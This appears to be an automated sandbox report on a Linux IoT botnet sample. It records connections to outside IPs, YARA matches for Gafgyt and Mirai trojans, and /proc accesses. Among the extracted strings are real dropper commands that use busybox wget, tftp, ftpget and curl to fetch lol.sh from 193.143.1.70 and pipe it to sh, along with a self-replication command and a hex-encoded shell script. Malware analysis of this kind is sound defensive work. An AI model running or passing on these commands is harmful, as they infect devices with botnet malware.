Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.189.75.88 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 193.143.1.70 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.223.230.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 152.153.237.220 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 187.89.92.80 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.203.190.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 97.2.185.203 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 44.54.85.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 112.18.96.140 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 95.148.177.210 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 99.242.99.122 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 148.216.229.243 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 55.213.172.84 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.15.55.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 18.200.149.5 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 67.179.206.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 88.247.182.156 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.216.19.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.64.157.84 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 222.43.160.67 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.189.75.88 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-se |
Source: Initial sample |
String containing 'busybox' found: usage: busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox hostname PBOC |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo > |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -ne |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http://193.143.1.70/lol.sh -O- | sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep |
Source: Initial sample |
String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .kGET /dlr. HTTP/1.0 |
Source: Initial sample |
String containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x2 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: 6228.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: 6237.1.0000000000400000.0000000000419000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16 |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6430/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6399/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6432/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6398/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6057/cmdline |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6431/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6434/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6411/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6433/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6390/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/799/cmdline |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6447/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6446/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6429/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6428/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6362/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6441/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6440/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6443/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6442/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6401/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6445/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6400/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6444/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/1/cmdline |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6436/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6435/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6438/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6437/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6418/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6417/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 6337) |
File opened: /proc/6439/status |
Jump to behavior |